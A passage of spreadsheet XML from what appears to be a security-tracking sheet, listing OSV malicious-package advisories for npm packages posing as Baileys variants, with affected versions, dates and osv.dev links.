      <c r="D676" s="5" t="inlineStr"/>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="inlineStr"/>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr">
        <is>
          <t>npm:@bottino/baileys</t>
        </is>
      </c>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr"/>
      <c r="S67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@bottino/baileys (npm), version(s): 1.0.14, 1.0.13, 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17351</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17352</t>
        </is>
      </c>
      <c r="D677" s="5" t="inlineStr"/>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="inlineStr"/>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys</t>
        </is>
      </c>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr"/>
      <c r="S67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 (npm), version(s): 1.0.3, 1.0.1.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17352</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17353</t>
        </is>
      </c>
      <c r="D678" s="5" t="inlineStr"/>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="inlineStr"/>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys-new</t>
        </is>
      </c>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr"/>
      <c r="S67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@fhkryxv/baileys-new (npm), version(s): 0.3.22.</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17353</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17354</t>
        </is>
      </c>
      <c r="D679" s="5" t="inlineStr"/>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="inlineStr"/>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr">
        <is>
          <t>npm:@hanzofc/baileys</t>
        </is>
      </c>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr"/>
      <c r="S67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@hanzofc/baileys (npm), version(s): 7.0.1, 7.0.0.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17354</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17355</t>
        </is>
      </c>
      <c r="D680" s="5" t="inlineStr"/>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="inlineStr"/>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr">
        <is>
          <t>npm:@ikanngeming/ikannbail</t>
        </is>
      </c>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr"/>
      <c r="S68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@ikanngeming/ikannbail (npm), version(s): 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2.</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17355</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17356</t>
        </is>
      </c>
      <c r="D681" s="5" t="inlineStr"/>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="inlineStr"/>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikkysingle</t>
        </is>
      </c>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr"/>
      <c r="S68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@ikyyjee/ikkysingle (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17356</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17357</t>
        </is>
      </c>
      <c r="D682" s="5" t="inlineStr"/>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="inlineStr"/>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysinggle</t>
        </is>
      </c>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr"/>
      <c r="S68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@ikyyjee/ikyysinggle (npm), version(s): 1.7.7.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17357</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17358</t>
        </is>
      </c>
      <c r="D683" s="5" t="inlineStr"/>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="inlineStr"/>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysingle</t>
        </is>
      </c>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr"/>
      <c r="S68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@ikyyjee/ikyysingle (npm), version(s): 1.7.8.</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17358</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17359</t>
        </is>
      </c>
      <c r="D684" s="5" t="inlineStr"/>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr">
        <is>
          <t>npm:@japofc/baileys</t>
        </is>
      </c>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr"/>
      <c r="S68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@japofc/baileys (npm), version(s): 2.4.3, 2.4.2, 2.4.1, 2.4.0, 2.3.0, 2.2.0, 2.1.0.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17359</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17360</t>
        </is>
      </c>
      <c r="D685" s="5" t="inlineStr"/>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr">
        <is>
          <t>npm:@jojoxyz/condemnedforce-baileys</t>
        </is>
      </c>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr"/>
      <c r="S68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@jojoxyz/condemnedforce-baileys (npm), version(s): 2.3.0.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17360</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17361</t>
        </is>
      </c>
      <c r="D686" s="5" t="inlineStr"/>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="inlineStr"/>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr">
        <is>
          <t>npm:@kanaraa/baileys</t>
        </is>
      </c>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr"/>
      <c r="S68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@kanaraa/baileys (npm), version(s): 3.5.2, 3.5.1, 3.4.7, 3.4.6, 3.4.5, 3.4.4, 3.4.2, 3.5.0, 3.4.1, 3.4.0, 3.3.0, 3.2.0, 3.1.9, 3.1.8.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17361</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17362</t>
        </is>
      </c>
      <c r="D687" s="5" t="inlineStr"/>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="inlineStr"/>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr">
        <is>
          <t>npm:@kelvdra/baileys</t>
        </is>
      </c>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr"/>
      <c r="S68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@kelvdra/baileys (npm), version(s): 1.0.6-rc.1, 1.0.6, 1.0.5-rc.3.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17362</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17363</t>
        </is>
      </c>
      <c r="D688" s="5" t="inlineStr"/>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="inlineStr"/>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr">
        <is>
          <t>npm:@kxa/xbails</t>
        </is>
      </c>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr"/>
      <c r="S68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@kxa/xbails (npm), version(s): 0.0.5.</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17363</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17364</t>
        </is>
      </c>
      <c r="D689" s="5" t="inlineStr"/>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="inlineStr"/>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr">
        <is>
          <t>npm:@lendkzn/xntaabail</t>
        </is>
      </c>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr"/>
      <c r="S68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@lendkzn/xntaabail (npm), version(s): 7.0.0.</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17364</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17365</t>
        </is>
      </c>
      <c r="D690" s="5" t="inlineStr"/>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="inlineStr"/>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>npm:@lendxntaa/baileys</t>
        </is>
      </c>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr"/>
      <c r="S69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@lendxntaa/baileys (npm), version(s): 9.5.0, 9.3.0, 9.1.0, 9.0.2, 9.0.1.</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17365</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17366</t>
        </is>
      </c>
      <c r="D691" s="5" t="inlineStr"/>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="inlineStr"/>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr">
        <is>
          <t>npm:@levvicode/baileys</t>
        </is>
      </c>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr"/>
      <c r="S69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@levvicode/baileys (npm), version(s): 0.0.3, 0.0.2.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17366</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17367</t>
        </is>
      </c>
      <c r="D692" s="5" t="inlineStr"/>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="inlineStr"/>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr">
        <is>
          <t>npm:@mikudeveloper/grace</t>
        </is>
      </c>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr"/>
      <c r="S69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@mikudeveloper/grace (npm), version(s): 2.0.1, 1.0.21, 1.0.20.</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17367</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17368</t>
        </is>
      </c>
      <c r="D693" s="5" t="inlineStr"/>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr">
        <is>
          <t>npm:@mivesensei/baileys</t>
        </is>
      </c>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr"/>
      <c r="S69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@mivesensei/baileys (npm), version(s): 0.4.2.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17368</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17369</t>
        </is>
      </c>
      <c r="D694" s="5" t="inlineStr"/>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr">
        <is>
          <t>npm:@noxleyss/baileys</t>
        </is>
      </c>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr"/>
      <c r="S69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@noxleyss/baileys (npm), version(s): 1.1.10.</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17369</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17370</t>
        </is>
      </c>
      <c r="D695" s="5" t="inlineStr"/>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr">
        <is>
